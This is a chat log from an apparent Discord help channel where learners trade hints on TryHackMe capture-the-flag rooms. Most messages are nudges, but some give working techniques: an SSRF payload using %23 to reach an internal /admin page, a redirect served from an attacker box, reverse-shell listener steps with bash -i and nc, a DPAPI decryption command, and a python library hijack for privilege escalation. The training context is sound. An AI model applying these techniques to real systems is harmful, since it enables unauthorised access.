tropic garden
lucid junco
unreal lynx
#

asking me? yes! also i made it to the end. ๐Ÿ™Œ

lucid junco
#

So, just Madness?

unreal lynx
#

yup..but it seems im progressing. i'll ping if there's anything.

shell shale
#

https://tryhackme.com/r/room/owasptop102021
task 11
hint says Is there any security question that can be easily guessed? which obviously means What's your favourite colour?, right? I ran a sniper attack with Burp's Intruder and a wordlist of ~200 lowercase colors, and got nothing. What am I missing?

TryHackMe

Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.

ruby creek
shell shale
# ruby creek It is the colors and it's not an obscure one. You muts be doing something wrong ...

I manually went through the responses, Location header was always the same, leading to the same page, so I'd say that should be accurate.
I now tried with wfuzz too, no luck.
I used this color wordlist's first column:
https://github.com/codebrainz/color-names/blob/master/output/colors.csv

GitHub

Provides color names and HTML/RGB mappings in various output formats. - codebrainz/color-names

ruby creek
#

Take the ten most obvious colors you can think of and try it manually, no tools

#

I can't spontaneously tell you why it didn/t work with burp and wfuzz

#

ok i know why it doesnt work

#

the wordlist doesn't contain the right color

#

as far as i see

#

It has 81 colors that contain the correct color, with all sorts of quirky qualifiers, but never the actual, plain color every child knows

shell shale
#

I was hoping exactly that wouldn't happen lol, I'll try

ruby creek
#

Unless I missed it, which is possible.

#

I mean, sacramento_state_green, ufo_green, screaming_green, who comes up with that stuff...

#

green_color_wheel_x11_green oO

shell shale
#

oh really... I tried red, green, blue the first time, but I guess when it reloaded the page, I didn't reselect the color question facepalm silly me, thanks @ruby creek ๐Ÿ˜„

green minnowBOT
#

Gave 1 Rep to cyberterms (current: #254 - 20)

shell shale
#

about wfuzz/Burp not working, I bet it's because I didn't copy the PHPSESSID cookie after entering joseph

ruby creek
#

learned something today then ๐Ÿ‘

dreamy cargo
#

What I can do now from here? ๐Ÿค”

#

Any hint.. please.. little also

ruby creek
#

It might be too early for you to attempt this if you have this question, no offense.

dreamy cargo
#

ahh now it's ok

#

I am doing

#

this room

#

and i saw source code and /assest directory and also robots.txt and got somethings.. but I don't know what to do next so I was trying to do ssh connection

#

and I am not able to connect ssh as it says something like public key

lucid junco
#

You don't interact with the SSH in Picklerick.

#

That's for the room dev.

dreamy cargo
#

please delete my comment if I revealed anything related to ctf

dreamy cargo
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2313)

ruby creek
# dreamy cargo

The ssh host keys you highlighted in your screenshot are irrelevant in 99.99% of cases. You're unlikely to ever do anything with them.

dreamy cargo
ruby creek
# dreamy cargo And I have not that much knowledge yet to do anything with them ๐Ÿ˜“ can you teach...

They are there to identify the server to you. So that you know you're connecting to the right server and not that of an attacker. When you connect to a server for the first time, your local machine writes the server's "fingerprint" in the "known_hosts" file. If you connect to the server again it checks that file and warns you if the fingerprint changed. That could indicate a man-in-the-middle attack.

ruby creek
dreamy cargo
green minnowBOT
#

Gave +1 Rep to @ruby creek (current: #230 - 23)

gentle plume
#

HI im doing static malware analysis for the malbuster room.
im trying to view one specific header value - am i looking at the wrong place? i have tried checking the data type manager as well to match with any other field but kinda lost

gentle plume
shell shale
#

https://tryhackme.com/r/room/owasptop102021
Task 22 - SSRF
I was hoping the server's GET request to my box, when responded with a redirect, would show the admin site, but it instead just returned an empty PDF... :/ any tips what to look for?

TryHackMe

Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.

#

the request I tried:
GET /download?server=http://attacker-box:9001&id=75482342
then I'd paste this redirect to the running nc:

HTTP/1.1 301 Moved Permanently
Server: nginx
Connection: close
Content-Length: 0
Location: http://127.0.0.1/admin

which returns the empty PDF

ruby creek
#

just an idea: Have you tried URL encoding the part after GET?

shell shale
#

I don't think that's necessary because the GET request was processed just fine

#

[this](#878393611929129000 message) says the PDF file should be enough, because it's supposed to access an internal resource which it presumably does, but I'm not so sure

#

oh so I found the answer [here](#room-help message) ... ||http://10.10.207.210:8087/download?server=localhost:8087/admin%23&id=75482342 - the important thing is %23 - #|| but I don't get why...

shell shale
#

oh I know why! ||the hash sign is used as a HTML fragment, so when the URL is filled by this code: crl.setopt(crl.URL, server + '/public-docs-k057230990384293/' + filename) it becomes localhost:8087/admin#/public-docs-k... which accesses the /admin endpoint ๐Ÿ’ก||

shell shale
shell shale
ruby creek
dapper badge
lucid junco
dapper badge
#

Yes the task 6

#

Yes I have tried but can't find

ruby creek
ruby creek
dapper badge
#

Great ๐Ÿ˜ƒ

ruby creek
dapper badge
#

For sure

#

Yes

#

So excited

#

I am now able to go next

#

Thanku

dapper badge
gaunt otter
#

The last 2 questions for ToolRus
I'm stuck on the last 2 questions trying to figure out how to exploit the box to gain shell access. Any hints in the right direction to focus on would be awesome!
https://tryhackme.com/r/room/toolsrus

#

NM looks like I just figured it out seems I needed to step away for a day haha

tropic garden
#

I'm working on Road (https://tryhackme.com/r/room/road) and was wondering if any one could give a nudge? I've been tinkering with ||/usr/bin/sky_backup_utility|| and still haven't figured out how to escalate privileges into || webdeveloper ||.

TryHackMe

Inspired by a real-world pentesting engagement

tropic garden
lucid junco
tropic garden
#

Tried the password, but it didn't work. I also saw one password purporting to be a secure one, but didn't work as well.

tropic garden
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2347)

tropic garden
#

Appreciate the assistance @lucid junco! Not sure why it didn't occur to me to check that one although it was probably because it was my first time encountering it in a ctf.

green minnowBOT
#

Gave 1 Rep to .scrubz. (current: #1 - 2348)

ruby path
#

anyone good at command line searching event logs? i need a hand to get to the answers for Windows Events Log room

this stuff has way toooooo many options

so the question goes like this
'A Log clear event was recorded. What is the 'Event Record ID'?'

can't seem to find my way in searching for it correctly

#

this is concerning room Windows Event Logs

tropic garden
ruby path
#

so i kept being stuck for a long time, but then deciding to move on and googling for the id's which gave me enough to progress further

tame nexus
#

Heeeeey

#

Hints are allowed for airplane room ?

median cobalt
tame nexus
#

Seems I am in a rabbit hole ^^ or I'm missing something

median cobalt
#

I can give you a bit of hint, but I'm kinda at the beginning ๐Ÿ˜„

tame nexus
#

I'm already into this

median cobalt
#

Have you got any further?

tame nexus
#

i'm ok with the first vuln

median cobalt
#

I got two usernames. In that case could you give me a hint ? ๐Ÿ˜„

tame nexus
#

I have some informations an got some files. I could do a thing if I have access to a particular function if you understand what I mean

median cobalt
#

I'm stuck here ๐Ÿ˜„

#

tryin to brute force ssh

tame nexus
#

I don't think we need to bruteforce it :/

median cobalt
#

yeah you're probably right ๐Ÿ˜„

#

any hints?

tame nexus
#

Sent you a dm

ruby creek
tame nexus
green minnowBOT
#

Gave +1 Rep to @ruby creek (current: #85 - 76)

lucid junco
tame nexus
modest bear
#

hey I'm having a problem with this question in room Red Team Engagements on task 3:

What is the first access type mentioned in the document?

lucid junco
modest bear
lucid junco
modest bear
lucid junco
modest bear
livid gull
#

I need a little nudge in the right direction or hint. I am doing "Chill Hack" I have a shell and have done "sudo -l" but I am not sure what to do with that information. It says nopassword but that file is already world readable. Sorry I am not giving to many specifics I don't know how much info is ok to post I don't want to ruin it for someone else.

ruby creek
#

Continue by investigating the code in that file. Could it be vulnerable?

livid gull
# ruby creek You're on the right track with your findings.

Thank you! I have one question about that vulnerable as in changing the code or using it as is? I ask because if it is using it as is then I know I need to do some learning to better understand what is there and how it actually works vs how I think it works.

green minnowBOT
#

Gave +1 Rep to @ruby creek (current: #64 - 109)

livid gull
green minnowBOT
#

Gave +1 Rep to @ruby creek (current: #63 - 112)

ruby creek
livid gull
tropic garden
livid gull
#

I had to go through a right up and still had some trouble fully understanding it.

#

I'm now on Gotta Catch'em All! currently working on privesc. It's an area I need to work at

tropic garden
livid gull
sterile bobcat
#

Is there a way to just pick up where you left off for the last clocky answer? really don't want to start all the way over.

lucid junco
sterile bobcat
#

@lucid junco Gotcha, the last part is kicking me hard lol.

livid gull
#

I am looking for a hint to point me in the right direction in "Gallery" I am stuck trying to find the admin password hash though I already have the next flag and am on the box with a reverse shell and have switched users already. I just cant seem to figure out where to find the hash. Any advice would be greatly appreciated

tropic garden
livid gull
#

also how did you black that out until I click on it? that seems like a good thing to learn I am scared of saying to much when I ask for help. I don't want to ruin things for other people.

ruby creek
#

||like this||

ruby creek
tropic garden
livid gull
green minnowBOT
#

Gave +1 Rep to @tropic garden (current: #11 - 583)

cursive palm
#

Hey anyone up

tropic garden
cursive palm
#

How to abuse /usr/bin/** to get root in mkingdom

tropic garden
cursive palm
#

K

scarlet whale
#

Source Code Security Task 8 Secret management. I struggle to find the hidden flag, even though I think it stares you in the eye as you know it... but where?

remote aurora
#

Been at /r/room/relevant for an hour and haven't been able to find anything other than it's a Windows machine with IIS, SMB/NetBIOS and RDP

No dir's found on web, no smb or rdp exploits

#

So far found SMBDomain RELEVANT and probably Windows Server 2016

#

Will check UDP next, but almost out of ideas

lucid junco
remote aurora
#

i did check the more recent ones, i didn't check the 2012 and earlier ones. ill check again in abit. taking a break for lunch ๐Ÿ˜›

remote aurora
#

Got it ๐Ÿ™‚

chrome helm
#

I also read the hint in the source code, but I can't figure out which "console" it's about.๐Ÿคทโ€โ™‚๏ธ
The room is "pokemon".
Who knows where this console is hidden?
||If we are talking about the console in the browser's "developer tools", then there are just Pokemon names, there is nothing else interesting.||

lucid junco
#

The console is the browser.

lucid junco
#

Or is it a rabbithole? ;p

chrome helm
#

There is a code there, but I haven't figured out how it helps to get a foothold on the machine yet.
If I'm only going in the right direction. Maybe I have the wrong vector of thought on how to exploit this.๐Ÿค”

lucid junco
#

Have you checked the source code of the website?

chrome helm
lucid junco
chrome helm
lucid junco
#

Yeah. You're missing it, would you like a hint?

#

@chrome helm

chrome helm
#

I'll try to think about it.
Not yet, I want to figure it out for myself (if it's obvious))

lucid junco
#

It really is. ๐Ÿ˜„

#

[It's in that screenshot]

tropic garden
#

I've looked at the console and played around with the code though I've yet to make sense of it. NotLikeThis

lucid junco
#

Lol

tropic garden
#

Maybe I'll give it one last attempt when I get the chance and let you know. I'm still playing catchup with work and a bunch of training hours I need to complete this weekend. psyDuck

chrome helm
#

I took a fresh look at the source code.
I had an epiphany.๐Ÿ˜…
@lucid juncoThanks, I was blind coolguy

remote aurora
#

I can't for the life of me seem to access this folder from powershell.

I own it. I can write to it, list it, move it, try it somewhere else.

#

But no matter what i cant read any file from powershell

#

I've tried using the example commands byte for byte ... and still the error persists

#

Figured it out

#

apparently just don't specify any path at all

#

and suddenly it can access it

floral frigate
#

Ahoi! I want to solve the optional SSRF in Task 22 for owasptop102021. Though I'm not sure in which direction to head or if I'm on the wrong track. I'm wondering if I should take a closer look on how to get the Werkzeug PIN when forcing a stacktrace. Please give me a nudge ๐Ÿ™‚

lapis pond
floral frigate
#

Thanks @lapis pond I'm really at loss here. I don't know how the admin page actually checks for localhost. I know from the previous task how to direct traffic to a different server, but don't see how that helps. I now tried to use the machine as its own target but this also just generates the pdf downloads with either the resume or a 404 if I try different ids or append /admin to the server param. I don't see how to manipulate the id param as it needs to be an int or the page throws an exception and I don't think I should follow the Werkzeug path.
I know that the request for /download would end up in /admin/public-docs-k057230990384293/ but still... I'm just stuck or blind or

green minnowBOT
#

Gave +1 Rep to @lapis pond (current: #106 - 62)

lapis pond
floral frigate
tropic garden
lucid junco
#

Check the source code again.

tropic garden
lucid junco
tropic garden
lucid junco
tropic garden
remote aurora
#

How can I login with a non-ascii character in the password...

#

I can't type it, I can't pass it in shell or as a variable.

#

It contains a hex(200) and a ( which seems to be enough to break any quote system I can find

#

Has anyone actually ever used this or seen this in production? I can't imagine anyone would set a password to something that could never be typed.

#

managed to get in, but not by using that password, that's ridiculous.

tropic garden
remote aurora
#

/r/corp i believe

tropic garden
remote aurora
#

around the 1hr mark

chrome helm
#

Tell me what I'm doing wrong.
room - magician
There are a bunch of examples of how to create a payload in the form of a downloadable file.
I do various checks on the POC, but none of them work.
Is there a need for a different approach to the exploit or something else?

lucid junco
#

Are you trying to get access?

chrome helm
lucid junco
chrome helm
#

Maybe my code itself is not correct.
I have to upload the file and wait for the service to process it.
The malicious code is triggered and I get what was in the code.
I don't have to open the file from the site myself?

chrome helm
#

apparently, I'm doing something wrong.
or I need to edit these files in some other way.
not a single file wants to work.
I'm adding magic bytes and no bytes.
I downloaded ready-made exploits.
They don't work either.
Who passed this box, write in a personal account how you decided it.
I don't want to read a ready-made step-by-step walkthrough of a "easy" box, where they will give a ready-made solution, I want to understand how it works on its own.๐Ÿ™

fleet pike
#

re: Dead End, is it old enough now to ask what the service or application that indexed the vulnerability we are looking for. and NOT the key itself I've spent a really long time looking at the registry keys on the vm and still haven't found what i'm looking for.

Original question: What is the full registry path where the existence of the binary above is confirmed?

#

@chrome helm How are you editing/entering the data for the poc exploits?

#

like vi on attackbox?

#

open page with poc, then file save-as in browser?

chrome helm
green minnowBOT
#

Gave +1 Rep to @fleet pike (current: #641 - 6)

chrome helm
#

But now I'm trying to get root and I haven't figured out which direction to go in yet.๐Ÿ˜• (room - magician)

chrome helm
# lucid junco Linpeas?

Yeah, I did.
I'll try to check the output again more carefully.
(the only thing that got me hooked there was this)

lucid junco
chrome helm
#

But pivoting didn't give me access to the site. And there is little information locally through curl.)
I will try to think in this direction if I have chosen the right vector)

chrome helm
lucid junco
tropic garden
#

I'm not sure if I'm missing something obvious again. ๐Ÿคฃ

lucid junco
tropic garden
#

Yeah, I'm scouring the lse and linpeas output line by line. ๐Ÿคฃ

jagged plinth
#

Hello

In the Network Services Room under Task 4 (Exploiting SMB), the question is: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?

Can anyone give a hint what to look for? I have found the ssh private and public keys from the .ssh folder

lapis pond
jagged plinth
lapis pond
lucid junco
#

it's cactus

lapis pond
green minnowBOT
#

Gave +1 Rep to @lapis pond (current: #92 - 71)

jagged plinth
#

I was stuck because I forgot to move and place the id_rsa file into the .ssh folder and then initiate the ssh connection

After moving it into the folder it worked

glass mason
#

ON OSIRIS:
SPOILER ALERT!
I've substituted the old masterkey with the new one, then when i go and use it to decrypt the blobs around:

||C:\windows\temp\CQDPAPIBlobDecrypter.exe --master=9F9C0C578D5546FD08834375F1443E5B55400BF93EEA53CCE3BECA8690BBEFCD547B4EAA8E9B092D3D5C8D37842EFB46D874AB9A2EA852B0966EBA9AA8B20298 --entropy=DE135B5F18A34670B2572429698898E6 --blobfile=C:\Users\chajoh\AppData\Roaming\Microsoft\Protect\S-1-5-21-555431066-3599073733-176599750-1125\BK-WINDCORP --outfile=C:\windows\temp\BK-WINDCORP.txt --golden=C:\windows\temp\DKM.pfx||
There's something wrong with provided masterkey, try again!

#

CAN somebody give me a hint about it? please?? these CQDPAPI* tools are getting me crazy xD

#

why this output:
There's something wrong with provided masterkey, try again!
it doesn't seem to me that there is something wrong with it...

tawny bison
#

Hi Iโ€™m doing the pickle Rick room and I tried running gobuster to find hidden directories but all the requests are canceled. Could anyone explain why it is happening and if I can fix it ?

lucid junco
tawny bison
#

I donโ€™t understand why though, i was able to run dirb without trouble

white salmon
#

.

alpine kestrel
#

@white salmon yes said script is related to the path too root... but as you probably have noticed you can not edit it.... check for things that run multiple times on the target machine

green minnowBOT
#

Gave +1 Rep to @alpine kestrel (current: #4 - 1817)

alpine kestrel
#

no problem

lime sky
white salmon
# alpine kestrel <@456226577798135808> yes said script is related to the path too root... but as ...

No matter how hard I try I can never finish a CTF without reading a writeup..
I almost feel like it's too hard for me.

I read the script and thought of rewriting the base64 binary. so I ran which base64 and found it, but i had no permissions to edit it

So I gave up and checked a writeup, and the solution was editing base64.py
Idk how was I supposed to know that base64.py is used instead of the base64 in /usr/bin/base64

I just dont get the same ideas as you guys.

alpine kestrel
#

because the script is a python script so it uses a python library

alpine kestrel
white salmon
#

Yeah but my brain thought if which base64 returned some binary, thats the one its using

#

its just hard..

white salmon
tranquil sparrow
#

constant learning, adapting, overcoming.

#

More often than not, failing, and trying again.

#

Finally take lots of good notes...

green minnowBOT
#

Gave +1 Rep to @tranquil sparrow (current: #641 - 6)

hallow onyx
#

Hi, I need a hint with one of the problems in the regular expressions room. "Match all of the following filenames: ab0001, bb0000, abc1000, cba0110, c0000 (don't use a metacharacter)". So my initial thought process was to start with ||[abc]|| but I have am not sure where to go from there. I have looked through the previous tasks but I still stumped on this.

rich scaffold
tranquil sparrow
#

Rather embarrassingly I went to check out the room, only to find that I did not finish it... Guess I know what I'm doing with my next block of time.

hallow onyx
hallow onyx
#

Ok nevermind I got it ๐Ÿ˜Š

chrome helm
#

Hi!
Are there Java specialists among you?)
I pass the room - "glitch", I have already fuzzing everything that is possible and different wordlists.
I looked through Burp and through the developer panel. Which way should I dig in search of an "access token"?
The only thing that attracted attention was the catalog -|| "/secret/"||
I also checked the image from the site with tools:
steghide exiftool strings binwalk
But everything is clean there.

rich scaffold
#

Java or Javascript? probably javascript. aww. got my hopes up lol. I'm no JS expert unfortunately

hollow kettle
#

Someone solves the Include challenge (from the advanced server side attack path ) ?

sudden schooner
#

I am doing OWASP Top 10 room. On Task 7 it states to open MACHINE_IP:8088 for the lab. However when i enter the ip followed by ":8088", I do not get any response. Can anyone help regarding what can be the issue?

tropic garden
chrome helm
sudden schooner
tropic garden
sudden schooner
tropic garden
tropic garden
kind prawnBOT
sudden schooner
lime oak
#

Use your own kali machine

lucid junco
#

Machine-ip gets replaced.

sudden schooner
sudden schooner
lime oak
#

For windows you need subscription brother

#

It will auto fetch with windows rdp

sudden schooner
#

I was able to access it after connecting using OpenVPN. There must be some issue in attackbox

pastel talonBOT
#
Pong!
API Latency

110ms

Client Latency

351ms

cold wedge
#

Working on Opacity after being away for a long while. I didn't have any luck distinguishing a valid username from the initial login page, so I began enumerating directories.

I came across the image upload page at ||/cloud||, as well as the ||storage.php|| page a successful upload redirects to. I'm unable to preview any valid images I uploaded on that page. Trying to view them directly at ||/cloud/images/Foo.jpg|| results in a 'Not Found' page that says: The requested URL was not found on this server.

I was able to sneak a .php.jpg file through, though I'm not sure how I'm going to interact with it yet. I've done a bit of poking on the login page, but haven't gotten anywhere with basic sql injection, user enumeration, or anything really.

I don't want hints so much, but rather reassurance I'm not poking around a dead end. Is the web page bait?

Edit: WOO!

cold wedge
#

I was able to get a revshell running.

Had to call it a night before I got anywhere else, but I'll make progress after work tonight.

misty karma
#

anyone have a hint on how to get the credentials for the skynet administrator room?

#

the hidden directory one, or whether i need to somehow bypass it. it doesn't seem the password is in the rockyou.txt or log1.txt unlike the squirrelmail password

#

default credentials also do not work

lucid junco
misty karma
lucid junco
misty karma
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2505)

misty karma
#

btw these books in the milesdyson share folder from the skynet room sound interesting. however i suspect it's illegal if we downloaded them to read them for ourselves, right?

tropic garden
misty karma
green minnowBOT
#

Gave +1 Rep to @tropic garden (current: #11 - 613)

queen vapor
hallow onyx
queen vapor
green minnowBOT
#

Gave +1 Rep to @hallow onyx (current: #2131 - 1)

keen crane
#

hi

#

just started

#

stucked at the first hack

#

can someone help please

velvet lichen
#

stuck where?

raw wadi
#

Hello I am stuck on getting the third password on the nano cherry room

Iโ€™ve tried connecting to bob-boba by using http.server and netcat but still no luck

it either canโ€™t read the file or it wonโ€™t connect through netcat

Is there another way

tranquil sparrow
#

@raw wadi If I recall correctly ||there is no password for bob-boba, you need to abuse a service/script to get a reverse shell. This is achieved through the initial credentials you are given.||

raw wadi
#

@tranquil sparrow Ahh yes this is what I meant

But Iโ€™m still struggling for some reason, i would do
|| 1. the reverse shell of bash -i on revshell.com using port 123 under the correct file of course.
2. Then input the cherryontop.tld with the ip under notsus user in hosts file
3.under no user
Then do python3 -m http.server 8000
4.under no user
Seperate terminal run nc -lvnp 123 ||

#

But http.server would not output anything unless I manually go to the file in a browser and trust I waited a while to
And if I manually do it the nc -lvnp part wonโ€™t connect to anything

#

Iโ€™m going to try again today but Iโ€™m been stuck here for a while

tranquil sparrow
#

http.server isn't going to do much for you in this instance except allow you to serve files from the current user.

#

we're trying to get a shell for another user, so we need to find some sort of service / script thats running as that user that we can abuse to connect back to our machine.

#

So ||enumerate crontab maybe there is something there that we can host locally and call out to?||

raw wadi
#

Ok Iโ€™ll give it another shot in a bit and Iโ€™ll get back to you thx for the advice

tranquil sparrow
#

np.

crimson quartz
tropic garden
chrome helm
#

Something the author has overdone a lot with the machine and CTF)
How do I find the last flag if you are already on the machine as root?
Room - Cat Pictures

tranquil sparrow
#

@chrome helm are you certain you are root on the machine? or are you in a virtual environment/container?

lucid junco
chrome helm
chrome helm
chrome helm
#

Room - Cat Pictures

#

It is strange that the manual enumeration did not give me hints about the container.
for user in $(cat /etc/passwd | awk -F: '{print $1}');do echo "$user" ; id "$user" ;done | grep -B 1 "docker"
find / -name docker.sock 2>/dev/null ls -l /run/docker.sock ps -ef | grep -i "docker" docker images
How else can you tell that I'm in a container?

tranquil sparrow
#

Edited out, it's not fair to make that statement, nor is it accurate ("Hostname is sometimes a good indicator").

#

I will say that if no hostname is set there is typically a random hash for the hostname, and container environments typically only run the services that they need, so the ps aux list would be shorter than normal.

chrome helm
# lucid junco ๐Ÿ˜‰

And there is also a hint on how to get out of the container|| (I realized that it is not privileged and I have few accesses). How should I apply this port, via the "pivoting" from the attacking machine or somehow from the inside.?||

misty karma
#

can anyone give me a little hint on the overpass 2 hacked room? just need the root flag

#

nvm got it

#

or no i haven't. tried using the rsa key but that didn't work to get root, only to get into the james account

unreal lynx
#

Doing Valley ctf room . Can any give me a hint to gain root access? i think i did more than enough enumeration .

#

is it ||kernel exploits|| way to go?

lucid junco
unreal lynx
unreal lynx
lucid junco
unreal lynx
lucid junco
unreal lynx
#

Oh wait.

unreal lynx
chrome helm
# lucid junco ๐Ÿ˜‰

Thanks, I figured it out!
This port is not involved in any way to get out of the container)๐Ÿ˜…

green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2515)

unreal lynx
# lucid junco Are you sure?

if im not wrong..the ||script|| doesn't look it is executing the ||*.enc|| file . it only saves to the output directory. Then how im able leverage this for privesc?

lucid junco
unreal lynx
unreal lynx
lucid junco
unreal lynx
lucid junco
unreal lynx
lucid junco
#

No

lucid junco
unreal lynx
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2516)

unreal lynx
unreal lynx
# lucid junco Have a search for the base64 library vulnerability

Thanks for all hints. It's done. in the end...I used AI to make the ||python script|| . I shouldn't have done it. Ik it's not allowed in exams...but I'm not good at python . Still I tried to make that
||script|| myself but it failed every time. I know what I did was wrong...still I think what I did is okay than giving up . Yh I don't deserve it.
Apart from that This was hell of a ctf. Took me almost a day for just only privesc. Python Chads can surely nail it in no time.

green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2517)

unreal lynx
#

Um yes. To ||decode|| and ||execute|| the ||encoded|| ||reverse shell|| .

lucid junco
#

To the file that already there.

#

The encryptphoto runs. imports the binary and that command gives us the rev shell.

lucid junco
#

Looks like the file isn't there.

lapis pond
#

You need to download the seclist files

lucid junco
#

They gave you the command for Attackbox usage.

trim haven
#

The command assumes youโ€™re on the attackbox

lucid junco
#

This will differ on your own machine.

lapis pond
lucid junco
#

Seclists may come default.

#

Just type sec then hit [tab]

misty karma
#

hello everyone,

#

so threat intelligence tools room scenario 1

the only way to solve this is by looking at a write up. i checked the hashes and it's the same hash, however talos doesn't list the required detection alias anymore

lucid junco
misty karma
misty karma
#

doesn't need to be much of a rework but just two-three sentences as a reminder that that page can be used as an alternative to talos would be great

unreal lynx
lucid junco
unreal lynx
tropic garden
lucid junco
unreal lynx
blazing gust
#

Hello

#

The Hint,....is ....Make sure your new balance is a positive number. If your balance still shows a negative value (even after refreshing the page), you may need to transfer more money.

blazing gust
#

Halo

lucid junco
#

Hello.

lucid junco
tropic shard
#

Are $_requests a global variable? I'm not entirely sure I understand it.

stoic flower
native mortar
#

hey anyone solved friday overtime. (I'm done Needs to examine questions and expand the search options).

misty orchid
#

i need help in a room called jack. Is. Is anyone familiarised with it?

tranquil sparrow
#

It's been a little bit since I did it, what do you need?

misty orchid
tranquil sparrow
#

Have you managed to enumerate users?

misty orchid
tranquil sparrow
#

Have you created a userlist to bruteforce their logins?

misty orchid
tranquil sparrow
#

Which word list?

misty orchid
#

rockyoutxt

tranquil sparrow
#

Let me open it up and see.

misty orchid
tranquil sparrow
#

You should use the full rockyou list

#

should be zipped inside that folder.

#

May be a tar file, I can't recall.

misty orchid